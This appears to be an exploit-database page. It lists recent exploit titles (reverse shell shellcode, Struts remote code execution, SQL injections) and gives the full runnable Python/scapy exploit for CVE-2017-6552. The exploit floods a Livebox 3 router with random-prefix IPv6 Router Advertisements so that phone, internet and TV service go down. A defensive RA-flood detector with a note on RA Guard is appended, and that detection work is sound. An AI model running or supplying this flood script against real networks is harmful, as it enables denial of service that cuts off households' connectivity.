
20 new exploits

Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service
Apache Struts2 - Skill Name Remote Code Execution
Apache Struts 2 - Skill Name Remote Code Execution
Linux - Reverse Shell Shellcode (65 bytes)
Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)
Linux - TCP Reverse Shell Shellcode (65 bytes)
Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)
Windows x86 - Executable Directory Search Shellcode (130 bytes)
Apache Struts2 < 2.3.1 - Multiple Vulnerabilities
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities
Country on Sale Script - SQL Injection
Media Search Engine Script - 'search' Parameter SQL Injection
Soundify 1.1 - 'tid' Parameter SQL Injection
BistroStays 3.0 - 'guests' Parameter SQL Injection
Nlance 2.2 - SQL Injection
Busewe 1.2 - SQL Injection
Fashmark 1.2 - 'category' Parameter SQL Injection
TradeMart 1.1 - SQL Injection
Drupal 7.x Module Services - Remote Code Execution
WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download
WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection
WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download
WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution
FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery
50 lines
1.4 KiB
Python
Executable file
#!/usr/bin/python

# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552

'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes.
An attacker can exploit this issue to render the affected system
unresponsive, resulting in a denial-of-service condition for Phone,
Internet and TV services.

Vulnerability has been discovered in April '16 and has been patched some time ago with the newest firmware.
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
livebox web UI, don't know if it's been implemented.

'''

from scapy.all import *
import sys  # used by sys.exc_info() in the KeyboardInterrupt handler
import time
import threading

start_time = time.time()

# Print the elapsed time every 5 seconds
def printit():
    threading.Timer(5.0, printit).start()
    interval = time.time() - start_time
    print 'Total time in seconds:', interval, '\n'

printit()

# Router Advertisement with a random prefix and a random source link-layer address
packet = Ether() \
        /IPv6() \
        /ICMPv6ND_RA() \
        /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
        /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))

try:
    sendp(packet,loop=1)
except KeyboardInterrupt:
    stored_exception=sys.exc_info()
except:
    pass

print "Goodbye"
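On the monitoring side, the traffic described above stands out as a burst of Router Advertisements that each announce a previously unseen prefix. The following Python 3 detector is an added example, not part of the original exploit file or of any vendor tooling: it parses the Prefix Information option from raw ICMPv6 RA bytes and alerts when a sliding window holds too many distinct prefixes. The names `ra_prefixes`, `RAFloodDetector` and `build_ra`, the 10-second window and the limit of 16 prefixes are assumptions, and the sample packets are constructed from the 2001:db8::/32 documentation range.

```python
import struct
from collections import deque

ND_ROUTER_ADVERT = 134  # ICMPv6 type of a Router Advertisement (RFC 4861)
OPT_PREFIX_INFO = 3     # ND option type: Prefix Information

def ra_prefixes(icmp6):
    """Return the (prefix, prefixlen) pairs carried by one ICMPv6 RA message."""
    if len(icmp6) < 16 or icmp6[0] != ND_ROUTER_ADVERT:
        return []
    found, off = [], 16                      # options follow the 16-byte RA header
    while off + 2 <= len(icmp6):
        opt_type, opt_len = icmp6[off], icmp6[off + 1] * 8  # length is in 8-byte units
        if opt_len == 0 or off + opt_len > len(icmp6):
            break                            # malformed option: stop parsing
        if opt_type == OPT_PREFIX_INFO and opt_len == 32:
            found.append((icmp6[off + 16:off + 32], icmp6[off + 2]))
        off += opt_len
    return found

class RAFloodDetector:
    """Alert when one window holds more distinct advertised prefixes than expected."""
    def __init__(self, window=10.0, max_prefixes=16):  # assumed thresholds, tune per site
        self.window, self.max_prefixes = window, max_prefixes
        self.seen = deque()                  # (timestamp, prefix), oldest first

    def observe(self, ts, icmp6):
        for prefix, _plen in ra_prefixes(icmp6):
            self.seen.append((ts, prefix))
        while self.seen and self.seen[0][0] < ts - self.window:
            self.seen.popleft()
        return len({p for _, p in self.seen}) > self.max_prefixes

def build_ra(prefix, prefixlen=64):
    """Constructed sample input: RA with one Prefix Information option, checksum 0."""
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    opt = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefixlen, 0xC0, 86400, 14400, 0)
    return hdr + opt + prefix

def demo():
    det = RAFloodDetector()
    legit = bytes.fromhex("20010db8000100000000000000000000")  # 2001:db8:1::/64
    normal = [det.observe(t * 3.0, build_ra(legit)) for t in range(5)]
    flood = []
    for i in range(40):  # 40 RAs in 0.4 s, each with a new documentation-range prefix
        prefix = bytes.fromhex("20010db8") + (0x00ff0000 + i).to_bytes(4, "big") + bytes(8)
        flood.append(det.observe(20.0 + i * 0.01, build_ra(prefix)))
    return any(normal), flood.index(True)

if __name__ == "__main__":
    print(demo())
```

On switched networks, RA Guard (RFC 6105) drops Router Advertisements arriving on host-facing ports; a counter like this is for monitoring segments where that filtering is not available.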